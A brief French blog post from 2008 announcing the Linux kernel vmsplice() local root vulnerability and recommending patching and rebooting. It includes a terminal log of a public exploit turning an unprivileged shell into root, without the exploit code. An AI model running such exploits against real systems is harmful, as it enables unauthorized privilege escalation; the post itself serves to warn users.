Faille de sécurité

Zic — Tue, 12 Feb 2008 19:49:00 +0100

Les kernels Linux des versions 2.6.17 à 2.6.24-1 sont actuellement victimes de la faille de vmsplice() permettant d'accéder au compte root à partir d'un compte utilisateur sans privilèges.

Voici une reproduction de la faille pour vous montrer à quel point il est malheureusement facile de la reproduire :

zic@Shiva:~$ ./vmsplice-local-root-exploit
---
 Linux vmsplice Local Root Exploit
 By qaaz
---
+ mmap: 0x0 .. 0x1000
+ page: 0x0
+ page: 0x20
+ mmap: 0x4000 .. 0x5000
+ page: 0x4000
+ page: 0x4020
+ mmap: 0x1000 .. 0x2000
+ page: 0x1000
+ mmap: 0xb7da6000 .. 0xb7dd8000
+ root
root@Shiva:~#

Pour vous en protéger, attendez simplement le correctif de sécurité qui ne devrait maintenant plus tarder pour votre distribution, ou appliquez vous-même le patch disponible sur kernel.org.

Dans les deux cas, n'oubliez pas de redémarrer : en effet, il s'agit l'une des rares fois sous les systèmes GNU/Linux où le redémarrage est nécessaire afin que les correctifs fonctionnent.

Sources de l'exploit

FF-IRC - Kernel Linux

Faille de sécurité